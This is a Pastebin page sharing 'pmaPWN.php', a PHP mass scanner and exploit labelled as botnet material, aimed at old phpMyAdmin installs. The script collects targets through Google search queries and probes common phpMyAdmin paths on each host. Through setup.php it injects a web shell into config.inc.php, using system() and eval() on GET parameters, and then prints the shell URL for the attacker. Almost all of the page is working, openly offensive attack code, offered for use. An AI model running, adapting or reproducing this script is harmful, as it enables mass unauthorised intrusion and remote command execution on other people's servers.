API tools faq
paste
bootssads

PMA BOTNET PHP SCRIPT

bootssads
Feb 23rd, 2024
326
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 12.40 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. $list = array(
  4. '/phpmyadmin/',
  5. '/phpMyAdmin/',
  6. '/PMA/',
  7. '/pma/',
  8. '/admin/',
  9. '/dbadmin/',
  10. '/mysql/',
  11. '/myadmin/',
  12. '/phpmyadmin2/',
  13. '/phpMyAdmin2/',
  14. '/phpMyAdmin-2/',
  15. '/php-my-admin/',
  16. '/phpMyAdmin-2.2.3/',
  17. '/phpMyAdmin-2.2.6/',
  18. '/phpMyAdmin-2.5.1/',
  19. '/phpMyAdmin-2.5.4/',
  20. '/phpMyAdmin-2.5.5-rc1/',
  21. '/phpMyAdmin-2.5.5-rc2/',
  22. '/phpMyAdmin-2.5.5/',
  23. '/phpMyAdmin-2.5.5-pl1/',
  24. '/phpMyAdmin-2.5.6-rc1/',
  25. '/phpMyAdmin-2.5.6-rc2/',
  26. '/phpMyAdmin-2.5.6/',
  27. '/phpMyAdmin-2.5.7/',
  28. '/phpMyAdmin-2.5.7-pl1/',
  29. '/phpMyAdmin-2.6.0-alpha/',
  30. '/phpMyAdmin-2.6.0-alpha2/',
  31. '/phpMyAdmin-2.6.0-beta1/',
  32. '/phpMyAdmin-2.6.0-beta2/',
  33. '/phpMyAdmin-2.6.0-rc1/',
  34. '/phpMyAdmin-2.6.0-rc2/',
  35. '/phpMyAdmin-2.6.0-rc3/',
  36. '/phpMyAdmin-2.6.0/',
  37. '/phpMyAdmin-2.6.0-pl1/',
  38. '/phpMyAdmin-2.6.0-pl2/',
  39. '/phpMyAdmin-2.6.0-pl3/',
  40. '/phpMyAdmin-2.6.1-rc1/',
  41. '/phpMyAdmin-2.6.1-rc2/',
  42. '/phpMyAdmin-2.6.1/',
  43. '/phpMyAdmin-2.6.1-pl1/',
  44. '/phpMyAdmin-2.6.1-pl2/',
  45. '/phpMyAdmin-2.6.1-pl3/',
  46. '/phpMyAdmin-2.6.2-rc1/',
  47. '/phpMyAdmin-2.6.2-beta1/',
  48. '/phpMyAdmin-2.6.2-rc1/',
  49. '/phpMyAdmin-2.6.2/',
  50. '/phpMyAdmin-2.6.2-pl1/',
  51. '/phpMyAdmin-2.6.3/',
  52. '/phpMyAdmin-2.6.3-rc1/',
  53. '/phpMyAdmin-2.6.3/',
  54. '/phpMyAdmin-2.6.3-pl1/',
  55. '/phpMyAdmin-2.6.4-rc1/',
  56. '/phpMyAdmin-2.6.4-pl1/',
  57. '/phpMyAdmin-2.6.4-pl2/',
  58. '/phpMyAdmin-2.6.4-pl3/',
  59. '/phpMyAdmin-2.6.4-pl4/',
  60. '/phpMyAdmin-2.6.4/',
  61. '/phpMyAdmin-2.7.0-beta1/',
  62. '/phpMyAdmin-2.7.0-rc1/',
  63. '/phpMyAdmin-2.7.0-pl1/',
  64. '/phpMyAdmin-2.7.0-pl2/',
  65. '/phpMyAdmin-2.7.0/',
  66. '/phpMyAdmin-2.8.0-beta1/',
  67. '/phpMyAdmin-2.8.0-rc1/',
  68. '/phpMyAdmin-2.8.0-rc2/',
  69. '/phpMyAdmin-2.8.0/',
  70. '/phpMyAdmin-2.8.0.1/',
  71. '/phpMyAdmin-2.8.0.2/',
  72. '/phpMyAdmin-2.8.0.3/',
  73. '/phpMyAdmin-2.8.0.4/',
  74. '/phpMyAdmin-2.8.1-rc1/',
  75. '/phpMyAdmin-2.8.1/',
  76. '/phpMyAdmin-2.8.2/',
  77. '/sqlmanager/',
  78. '/mysqlmanager/',
  79. '/p/m/a/',
  80. '/PMA2005/',
  81. '/pma2005/',
  82. '/phpmanager/',
  83. '/php-myadmin/',
  84. '/phpmy-admin/',
  85. '/webadmin/',
  86. '/sqlweb/',
  87. '/websql/',
  88. '/webdb/',
  89. '/mysqladmin/',
  90. '/mysql-admin/',
  91. );
  92.  
  93. if($argc > 1) {
  94.     print "|****************************************************************|\n";
  95.     print "        pmaPWN.php - d3ck4, [email protected]\n";
  96.     print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
  97.     print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
  98.     print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
  99.     print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
  100.     print "|****************************************************************|\n";
  101.     print "\n";
  102.     print "Usage: php $argv[0] \n";
  103.     exit;
  104. }
  105.  
  106.     print "|****************************************************************|\n";
  107.     print "        pmaPWN.php - d3ck4, [email protected]\n";
  108.     print "       phpMyAdmin Code Injection RCE Scanner & Exploit\n";
  109.     print "  This is PHP version original http://milw0rm.com/exploits/8921\n";
  110.     print "           credit: Greg Ose, pagvac @ gnucitizen.org\n";
  111.     print "        greetz: Hacking Expose!, HM Security, darkc0de\n";
  112.     print "|****************************************************************|\n";
  113.     print "\n";
  114.     $Handlex = FOpen("pmaPWN.log", "a+");
  115.     FWrite($Handlex, "|****************************************************************|\n");
  116.     FWrite($Handlex, "        pmaPWN.php - d3ck4, [email protected]\n");
  117.     FWrite($Handlex, "       phpMyAdmin Code Injection RCE Scanner & Exploit\n");
  118.     FWrite($Handlex, "  This is PHP version original http://milw0rm.com/exploits/8921\n");
  119.     FWrite($Handlex, "           credit: Greg Ose, pagvac @ gnucitizen.org\n");
  120.     FWrite($Handlex, "        greetz: Hacking Expose!, HM Security, darkc0de\n");
  121.     FWrite($Handlex, "|****************************************************************|\n\n");
  122.     print "[-] Master, where you want to go today? \n";
  123.     print "[-] example dork: intitle:phpMyAdmin \n";
  124.     fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
  125.     $dork = trim(fgets(STDIN));
  126.     print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  127.     FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
  128.     for($i = 0; $i <= 900; $i+=100) {
  129.     $ch = curl_init();
  130.     curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
  131.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  132.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  133.     curl_setopt($ch, CURLOPT_HEADER, 1);
  134.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  135.     curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  136.     curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  137.     $pg = curl_exec($ch);
  138.     curl_close($ch);
  139.  
  140.     if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
  141.     }
  142.      
  143.     foreach($res as $key) {
  144.         foreach($key as $target) {
  145.             $total++;
  146.         }
  147.     }
  148.     print "[+] Done. $total rows return.\n";
  149.     FWrite($Handlex, "[+] Done. $total rows return.\n");
  150.     FClose($Handlex);
  151.     foreach($res as $key) {
  152.         foreach($key as $target) {
  153.             $Handlex = FOpen("pmaPWN.log", "a+");
  154.             $real = parse_url($target);
  155.             $url = "http://".$real['host'];
  156.             print "\n[-] Scanning phpMyAdmin on ".$url."\n";
  157.             FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
  158.             FClose($Handlex);
  159.             sleep(5);
  160.             $curlHandle = curl_multi_init();
  161.             for ($i = 0;$i < count($list); $i++)
  162.             $curl[$i] = addHandle($curlHandle,$url.$list[$i]);
  163.             ExecHandle($curlHandle);
  164.             for ($i = 0;$i < count($list); $i++)
  165.             {          
  166.                 $text[$i] =  curl_multi_getcontent ($curl[$i]);
  167.                 //echo $url.$list[$i]."\n";
  168.                 $Handlex = FOpen("pmaPWN.log", "a+");
  169.                 if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  170.                 print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
  171.                 print "\n[+] Testing vulnerable, wait sec..\n";
  172.                 FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
  173.                 FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
  174.                     if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  175.                         print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
  176.                         FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
  177.                     }
  178.                 FClose($Handlex);
  179.                 exploit_site($url.$list[$i]);
  180.                 }
  181.             }
  182.             for ($i = 0;$i < count($list); $i++)//remove the handles
  183.             curl_multi_remove_handle($curlHandle,$curl[$i]);
  184.             curl_multi_close($curlHandle);
  185.             sleep(5);
  186.         }
  187.     }
  188.  
  189. function addHandle(&$curlHandle,$url)
  190. {
  191. $cURL = curl_init();
  192. curl_setopt($cURL, CURLOPT_URL, $url);
  193. curl_setopt($cURL, CURLOPT_HEADER, 0);
  194. curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  195. curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  196. curl_multi_add_handle($curlHandle,$cURL);
  197. return $cURL;
  198. }
  199. //execute the handle until the flag passed
  200. // to function is greater then 0
  201. function ExecHandle(&$curlHandle)
  202. {
  203. $flag=null;
  204. do {
  205. //fetch pages in parallel
  206. curl_multi_exec($curlHandle,$flag);
  207. } while ($flag > 0);
  208. }
  209.  
  210. function exploit_site($url) {
  211.     $ch = curl_init();
  212.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  213.     curl_setopt($ch, CURLOPT_HEADER, 1);
  214.     curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  215.     curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
  216.     $result = curl_exec($ch);
  217.     curl_close($ch);
  218.     $ch2 = curl_init();
  219.     curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  220.     curl_setopt($ch2, CURLOPT_HEADER, 1);
  221.     curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
  222.     curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
  223.     $result2 = curl_exec($ch2);
  224.     curl_close($ch2);
  225.     //print $url;
  226.     if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  227.         print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  228.         print "\n[+] Exploiting, wait sec..\n";
  229.         $Handlex = FOpen("pmaPWN.log", "a+");
  230.         FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  231.         FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  232.         FClose($Handlex);
  233.         exploit($url);
  234.     }
  235.     else {
  236.         $Handlex = FOpen("pmaPWN.log", "a+");
  237.         print "\n[-] Shit! no luck.. not vulnerable\n";
  238.         FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  239.         FClose($Handlex);
  240.     }
  241. }
  242.  
  243.     function exploit($w00t) {
  244.         $Handlex = FOpen("pmaPWN.log", "a+");
  245.         $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  246.         //first get cookie + token
  247.         $curl = curl_init();
  248.         curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
  249.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  250.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  251.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  252.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  253.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  254.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);      
  255.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  256.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  257.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  258.         $result = curl_exec($curl);
  259.         curl_close($curl);
  260.         if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
  261.          
  262.         $token = $matches[1][1];
  263.         if ($token != '') {
  264.         print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  265.         FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  266.         $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  267.         print "\n[+] Sending evil payload mwahaha.. \n";
  268.         FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  269.         $curl = curl_init();
  270.         curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
  271.         curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  272.         curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  273.         curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  274.         curl_setopt($curl, CURLOPT_REFERER, $w00t);
  275.         curl_setopt($curl, CURLOPT_POST, true);
  276.         curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  277.         curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  278.         curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  279.         curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  280.         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  281.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  282.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  283.         $result = curl_exec($curl);
  284.         curl_close($curl);
  285.          
  286.         print "\n[!] w00t! w00t! You should now have shell here";
  287.         print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
  288.         print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  289.         FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  290.         FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
  291.          
  292.         }
  293.         else {
  294.             print "\n[!] Shit! no luck.. not vulnerable\n";
  295.             FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  296.             return false;
  297.         }
  298.         FClose($Handlex);
  299.         if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
  300.         //exit();
  301.     }
  302.  
  303. ?>
Tags: php pma PMA BOTNET
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!